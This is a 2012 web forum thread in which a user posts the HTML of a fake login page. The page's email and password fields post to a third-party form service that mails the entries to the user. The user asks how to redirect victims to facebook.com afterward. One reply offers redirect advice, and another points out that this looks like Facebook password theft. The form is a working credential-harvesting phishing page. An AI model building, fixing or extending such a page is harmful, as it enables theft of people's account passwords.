Need help with HTML redirection Tag

Discussion in 'HTML & Website Design' started by rubelahmed35, Jul 28, 2012.

  1. #1
    I have a login form(script) that made with formbuddy.com . now each time i put login information in this form it sends me the information to my inbox and redirect the current page to formbuddy's default page. but i want that it redirects me to other page(eg:www.facebook.com) after saving my login information.

    Hint:1. This form already uploaded and the link is: http://freecallanywhere.xtgem.com/Login Page
    2. Script of this form is:

    </div> <div style="background-color:#C8EBF9; padding: 5px"><!--h--><form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post"><!--h--><input type="hidden" name="username" value="robinhood35"><!--h--><input type="hidden" name="reqd" value="0"><!--h--><input type="hidden" name="url" value="http://gmail.com/sms.html"> <label>Email ID:</label> <input type="text" name="username" value="" /> <label>Password:</label> <input type="password" name="password" value="" /> <label> <input type="submit" name="submit"value="Login" />


    can anyone help me with this issue please! thanks in advance.....
     
    rubelahmed35, Jul 28, 2012 IP
  2. Mili19

    Mili19 Peon

    Messages:
    6
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #2
    You Just Need to Write the action="www.facebook.com" i.e. the page URL where you want to redirect it..

    instead of <form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post"> you need to write

    <form action="http://www.facebook.com" method="post">
     
    Mili19, Jul 29, 2012 IP
  3. SamedMermer

    SamedMermer Member

    Messages:
    15
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    41
    #3
    Ahaha are you triyng to steal Facebook Password ?
     
    SamedMermer, Jul 31, 2012 IP